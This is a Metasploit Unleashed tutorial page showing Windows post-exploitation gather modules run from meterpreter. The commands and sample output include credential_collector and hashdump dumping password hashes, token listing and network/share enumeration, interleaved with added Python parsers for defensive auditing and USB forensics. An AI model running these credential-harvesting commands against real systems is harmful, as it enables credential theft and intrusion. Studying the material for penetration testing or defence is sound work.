Windows Post Gather Modules

From Metasploit Unleashed


arp_scanner

The "arp_scanner" post module will perform an ARP scan for a given range through a compromised host.

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] 	IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] 	IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] 	IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] 	IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] 	IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] 	IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] 	IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] 	IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] 	IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] 	IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] 	IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] 	IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] 	IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] 	IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] 	IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] 	IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] 	IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] 	IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] 	IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] 	IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] 	IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >
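The module prints one "IP: ... MAC ..." line per responding host, with MAC octets left unpadded ("0:f:b5:..."). The following parser is an added example, not code from Metasploit or from this page: it normalizes those lines, marks addresses whose U/L bit is set (locally administered, which virtual and randomized NICs commonly use) and tags well-known hypervisor OUIs, so a defender reviewing an ARP sweep can see at a glance which hosts are vendor-assigned hardware. The sample text is a constructed subset of the output above; the OUI table holds IEEE-registered prefixes and is an assumption in the sense that it is not exhaustive.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the line format printed by arp_scanner
# (a subset of the hosts shown on this page).
SAMPLE_OUTPUT = """\
[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] \tIP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] \tIP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] \tIP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] \tIP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
"""

# OUI prefixes of common hypervisor virtual NICs (IEEE-registered values,
# not part of the original page; the list is illustrative, not exhaustive).
VIRTUAL_OUIS = {
    "00:0c:29": "VMware",
    "00:50:56": "VMware",
    "08:00:27": "VirtualBox",
    "00:15:5d": "Hyper-V",
    "52:54:00": "QEMU/KVM",
}

LINE_RE = re.compile(r"IP:\s*(\d{1,3}(?:\.\d{1,3}){3})\s+MAC\s+([0-9a-fA-F:]+)")


@dataclass
class ArpEntry:
    ip: str
    mac: str                    # normalized: zero-padded, lower case
    locally_administered: bool  # U/L bit (0x02 of the first octet) set
    hint: Optional[str]         # hypervisor name when the OUI is a known virtual NIC


def normalize_mac(raw: str) -> str:
    """Zero-pad each group: the module prints '0:f:b5:..' rather than '00:0f:b5:..'."""
    parts = raw.lower().split(":")
    if len(parts) != 6 or not all(1 <= len(p) <= 2 for p in parts):
        raise ValueError(f"not a MAC address: {raw!r}")
    return ":".join(p.zfill(2) for p in parts)


def is_locally_administered(mac: str) -> bool:
    """Addresses with the U/L bit set were not assigned from a vendor's OUI block."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def parse_arp_output(text: str) -> List[ArpEntry]:
    entries = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # status lines such as "[*] ARP Scanning ..." carry no host
        mac = normalize_mac(m.group(2))
        entries.append(ArpEntry(
            ip=m.group(1),
            mac=mac,
            locally_administered=is_locally_administered(mac),
            hint=VIRTUAL_OUIS.get(mac[:8]),
        ))
    return entries


def summarize(entries: List[ArpEntry]) -> dict:
    """Counts worth looking at first: how many addresses are not vendor-assigned hardware."""
    return {
        "hosts": len(entries),
        "locally_administered": sum(e.locally_administered for e in entries),
        "virtual_nic": sum(e.hint is not None for e in entries),
    }


if __name__ == "__main__":
    entries = parse_arp_output(SAMPLE_OUTPUT)
    for e in entries:
        flags = (["locally-administered"] if e.locally_administered else []) + ([e.hint] if e.hint else [])
        print(f"{e.ip:<16} {e.mac}  {' '.join(flags)}")
    print(summarize(entries))
```

Run against the full output above, the same parser shows that roughly half of the responding addresses carry the U/L bit, which on a lab segment like this one usually means virtual machines or containers rather than physical hardware; the 00:0c:29 hosts are VMware guests, consistent with what checkvm reports for the compromised host itself.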


checkvm

The "checkvm" post module, simply enough, checks whether the compromised host is a virtual machine. This module supports Hyper-V, VMware, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm 

[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >


credential_collector

The "credential_collector" module harvests password hashes and tokens on the compromised host.

meterpreter > run post/windows/gather/credential_collector 

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >


dumplinks

The "dumplinks" module parses the .lnk files in a user's Recent Documents folder, which could be useful for further information gathering. Note that, as shown below, we first need to migrate into a user process prior to running the module.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks 

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >


enum_applications

The "enum_applications" module enumerates the applications that are installed on the compromised host.

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on V-MAC-XP

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Adobe Flash Player 10 Plugin                                    10.1.53.64
 Windows Installer 3.1 (KB893803)                                3.1
 Metasploit Framework 3.4.1                                      3.4.1
 Mozilla Firefox (3.6.16)                                        3.6.16 (en-US)
 Notepad++                                                       5.7
 Microsoft SQL Server VSS Writer                                 9.00.1399.06
 Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)          9.00.1399.06
 WinPcap 4.1.1                                                   4.1.0.1753
 Python 2.5                                                      2.5.150
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 WebFldrs XP                                                     9.50.7523
 MSXML 6.0 Parser                                                6.00.3883.8
 ActivePerl 5.12.1 Build 1201                                    5.12.1201
 Kingview 6.53                                                   6.53
 VMware Tools                                                    8.4.5.10855
 Microsoft SQL Server Native Client                              9.00.1399.06
 Microsoft SQL Server Setup Support Files (English)              9.00.1399.06
 Microsoft .NET Framework 2.0                                    2.0.50727


meterpreter >


enum_logged_on_users

The "enum_logged_on_users" post module returns a listing of current and recently logged on users along with their SIDs.

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 3

Current Logged Users
====================

 SID                                          User
 ---                                          ----
 S-1-5-21-839522115-796845957-2147293891-500  V-MAC-XP\Administrator



Recently Logged Users
=====================

 SID                                          Profile Path
 ---                                          ------------
 S-1-5-18                                     %systemroot%\system32\config\systemprofile
 S-1-5-19                                     %SystemDrive%\Documents and Settings\LocalService
 S-1-5-20                                     %SystemDrive%\Documents and Settings\NetworkService
 S-1-5-21-839522115-796845957-2147293891-500  %SystemDrive%\Documents and Settings\Administrator


meterpreter >
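The SIDs in both tables follow the same structure: S-1-5-18/19/20 are well-known service identities, while S-1-5-21-A-B-C-RID is a machine- or domain-issued account SID whose last component (the RID) is what identifies the built-in Administrator (500) even after the account is renamed. The parser below is an added example, not code from Metasploit or from this page; the well-known SID and RID tables are documented Windows constants, and the S-1-5-21 sample values are copied from the output above.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Documented Windows constants (not taken from this page).
WELL_KNOWN_SIDS = {
    "S-1-5-7": "NT AUTHORITY\\ANONYMOUS LOGON",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

# S-<revision>-<authority>-<sub>-<sub>-...; the authority may be written as 0x... when large.
SID_RE = re.compile(r"^S-(\d+)-(\d+|0x[0-9A-Fa-f]+)((?:-\d+)*)$")


@dataclass(frozen=True)
class Sid:
    revision: int
    authority: int
    subauthorities: Tuple[int, ...]

    @property
    def rid(self) -> Optional[int]:
        """Relative identifier: the last sub-authority, unique within the issuing domain."""
        return self.subauthorities[-1] if self.subauthorities else None

    @property
    def domain_identifier(self) -> Optional[str]:
        """For S-1-5-21-A-B-C-RID SIDs, the machine/domain part without the RID."""
        if self.authority == 5 and len(self.subauthorities) == 5 and self.subauthorities[0] == 21:
            return "S-1-5-21-" + "-".join(str(x) for x in self.subauthorities[1:4])
        return None

    def __str__(self) -> str:
        return f"S-{self.revision}-{self.authority}" + "".join(f"-{x}" for x in self.subauthorities)


def parse_sid(text: str) -> Sid:
    m = SID_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a SID: {text!r}")
    auth = m.group(2)
    authority = int(auth, 16) if auth.lower().startswith("0x") else int(auth)
    subs = tuple(int(x) for x in m.group(3).split("-")[1:])
    return Sid(int(m.group(1)), authority, subs)


def classify_sid(text: str) -> str:
    """Human-readable meaning of a SID, independent of the account's current display name."""
    sid = parse_sid(text)
    if str(sid) in WELL_KNOWN_SIDS:
        return WELL_KNOWN_SIDS[str(sid)]
    if sid.domain_identifier:
        if sid.rid in WELL_KNOWN_RIDS:
            return f"{WELL_KNOWN_RIDS[sid.rid]} (RID {sid.rid})"
        if sid.rid >= 1000:
            return f"created account (RID {sid.rid})"
        return f"reserved RID {sid.rid}"
    return "other"


def same_domain(a: str, b: str) -> bool:
    """True when two account SIDs were issued by the same machine or domain."""
    da, db = parse_sid(a).domain_identifier, parse_sid(b).domain_identifier
    return da is not None and da == db


if __name__ == "__main__":
    for s in ("S-1-5-18", "S-1-5-19", "S-1-5-20",
              "S-1-5-21-839522115-796845957-2147293891-500"):
        print(f"{s:<45} {classify_sid(s)}")
```

The RID check is the detection-relevant part: a logon recorded for a S-1-5-21-...-500 SID is the built-in Administrator regardless of what the account is called, and accounts whose SID shares the machine identifier with it but carries a RID of 1000 or above were created on that machine after installation.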


enum_shares

The "enum_shares" post module returns a listing of both configured and recently used shares on the compromised system.

meterpreter > run post/windows/gather/enum_shares 

[*] Running against session 3
[*] The following shares were found:
[*] 	Name: Desktop
[*] 	Path: C:\Documents and Settings\Administrator\Desktop
[*] 	Type: 0
[*] 
[*] Recent Mounts found:
[*] 	\\192.168.1.250\software
[*] 	\\192.168.1.250\Data
[*] 
meterpreter >


enum_snmp

The "enum_snmp" module will enumerate the SNMP service configuration on the target, if present, including the community strings.

meterpreter > run post/windows/gather/enum_snmp

[*] Running module against V-MAC-XP
[*] Checking if SNMP is Installed
[*] 	SNMP is installed!
[*] Enumerating community strings
[*] 
[*] 	Comunity Strings
[*] 	================
[*] 	
[*] 	 Name    Type
[*] 	 ----    ----
[*] 	 public  READ ONLY
[*] 
[*] Enumerating Permitted Managers for Community Strings
[*] 	Community Strings can be accessed from any host
[*] Enumerating Trap Configuration
[*] No Traps are configured
meterpreter >


hashdump

The "hashdump" post module dumps the password hashes of the local user accounts on the compromised host, reading them from the registry.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::


meterpreter >
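Both credential_collector ("Extracted: user:lm:nt") and hashdump ("user:rid:lm:nt:::") emit the pwdump line format, and the values themselves tell an auditor a lot before any cracking is attempted: an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty password, an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, and an LM hash whose second half is aad3b435b51404ee belongs to a password of at most seven characters. The parser and hygiene audit below are an added example, not code from Metasploit or from this page; the two constants are well-known Windows values, and the sample lines are copied from the hashdump and credential_collector output above.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Well-known constants (not from this page): the LM field stored when no LM hash
# exists, and the NT hash (MD4 of the UTF-16LE empty string) of a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample copied from the hashdump output above (user:rid:lm:nt:::).
SAMPLE_HASHDUMP = """\
Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
"""

# Sample copied from the credential_collector output above (Extracted: user:lm:nt).
SAMPLE_COLLECTOR = """\
[+] Collecting hashes...
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
"""

# The RID group is optional so that both formats parse with one expression.
LINE_RE = re.compile(
    r"^\s*(?:Extracted:\s*)?(?P<user>[^:\s][^:]*):(?:(?P<rid>\d+):)?"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32})(?::::)?\s*$"
)


@dataclass
class HashRecord:
    user: str
    rid: Optional[int]  # None for credential_collector lines, which carry no RID
    lm: str
    nt: str


def parse_hashes(text: str) -> List[HashRecord]:
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # status lines such as "[+] Collecting hashes..." are skipped
        rid = int(m.group("rid")) if m.group("rid") else None
        records.append(HashRecord(m.group("user"), rid, m.group("lm").lower(), m.group("nt").lower()))
    return records


def audit(records: List[HashRecord]) -> Dict[str, List[str]]:
    """Credential-hygiene findings per account; an empty list means nothing stood out."""
    findings: Dict[str, List[str]] = {r.user: [] for r in records}
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        if r.nt == EMPTY_NT:
            findings[r.user].append("blank password")
        if r.lm != EMPTY_LM:
            findings[r.user].append("LM hash stored (LM hashing enabled, password at most 14 chars)")
            if r.lm[16:] == EMPTY_LM[16:]:
                findings[r.user].append("second LM half empty: password at most 7 chars")
        if r.rid == 500:
            findings[r.user].append("built-in Administrator RID")
        by_nt[r.nt].append(r.user)
    # Identical NT hashes mean identical passwords (no salt), i.e. password reuse.
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            for u in users:
                findings[u].append("same password as " + ", ".join(x for x in users if x != u))
    return findings


if __name__ == "__main__":
    for user, notes in audit(parse_hashes(SAMPLE_HASHDUMP)).items():
        print(f"{user:<18} {'; '.join(notes) or 'no findings'}")
```

On the sample above the audit flags Guest for a blank password, Administrator for a stored LM hash of a seven-character-or-shorter password, and HelpAssistant for a stored LM hash; the defender-side fixes are the usual ones (disable LM hash storage via the NoLMHash policy, enforce password length, disable or secure the built-in accounts).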


usb_history

The "usb_history" module enumerates the USB drive history on the compromised system.

meterpreter > run post/windows/gather/usb_history 

[*] Running module against V-MAC-XP
[*] 
   C:	                                                             Disk ea4cea4c 
   E:	STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:	FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:	IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime	                    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime	                    Thu Apr 21 13:09:43 -0600 2011
             Manufacturer	                            (Standard disk drives)
           ParentIdPrefix	                                      8&3a01dffe&0 (   E:)
                    Class	                                         DiskDrive
                   Driver	       {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

meterpreter >
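The module's output is the join of two registry sources: the drive-letter table (where E: points at a RemovableMedia path that embeds the instance id 8&3a01dffe&0&RM) and the per-device records, whose ParentIdPrefix 8&3a01dffe&0 is what lets the module print "( E:)" next to the Kingston device. The following code is an added forensic example, not code from Metasploit or from this page: it reproduces that correlation on a constructed dataset copied from the output above, parses the module's timestamp format into UTC, and builds a small device timeline.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Constructed sample built from the usb_history output above:
# drive letters with the device path they were mounted from ...
SAMPLE_MOUNTS = {
    "C:": "Disk ea4cea4c",
    "E:": "STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    "A:": "FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
}


@dataclass
class UsbDevice:
    name: str
    parent_id_prefix: str
    disk_last_write: str    # registry key last-write time, as printed by the module
    volume_last_write: str


# ... and one USB device record.
SAMPLE_DEVICES = [
    UsbDevice(
        name="Kingston DataTraveler 2.0 USB Device",
        parent_id_prefix="8&3a01dffe&0",
        disk_last_write="Thu Apr 21 13:09:42 -0600 2011",
        volume_last_write="Thu Apr 21 13:09:43 -0600 2011",
    ),
]

# RemovableMedia paths carry "<ParentIdPrefix>&RM" between the class name and the interface GUID.
REMOVABLE_RE = re.compile(r"^STORAGE#RemovableMedia#(?P<prefix>.+?)&RM#\{[0-9a-fA-F-]+\}$")


def parent_id_from_mount_path(path: str) -> Optional[str]:
    """ParentIdPrefix embedded in a RemovableMedia mount path; None for fixed disks, floppies, CD-ROMs."""
    m = REMOVABLE_RE.match(path)
    return m.group("prefix") if m else None


def correlate(mounts: Dict[str, str], devices: List[UsbDevice]) -> Dict[str, Optional[str]]:
    """Map each USB device record to the drive letter it was last mounted under (None if never)."""
    by_prefix: Dict[str, str] = {}
    for letter, path in mounts.items():
        prefix = parent_id_from_mount_path(path)
        if prefix:
            by_prefix[prefix] = letter
    return {d.name: by_prefix.get(d.parent_id_prefix) for d in devices}


def parse_last_write(text: str) -> datetime:
    """Parse the module's 'Thu Apr 21 13:09:42 -0600 2011' format into an aware datetime."""
    return datetime.strptime(text, "%a %b %d %H:%M:%S %z %Y")


def to_utc_iso(text: str) -> str:
    """Same timestamp normalized to UTC, so events from hosts in different zones line up."""
    return parse_last_write(text).astimezone(timezone.utc).isoformat()


def timeline(devices: List[UsbDevice]) -> List[Tuple[str, str, str]]:
    """(UTC ISO time, device, event) sorted oldest first."""
    events = []
    for d in devices:
        events.append((to_utc_iso(d.disk_last_write), d.name, "disk key written"))
        events.append((to_utc_iso(d.volume_last_write), d.name, "volume key written"))
    return sorted(events)


if __name__ == "__main__":
    for name, letter in correlate(SAMPLE_MOUNTS, SAMPLE_DEVICES).items():
        print(f"{name} -> {letter or 'no drive letter recorded'}")
    for when, name, event in timeline(SAMPLE_DEVICES):
        print(f"{when}  {name}: {event}")
```

The key last-write times are the usual caveat in USB forensics: they record when the registry key was last modified, which typically reflects the most recent connection of that device rather than its first, so a single record cannot by itself show how many times a drive was used.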



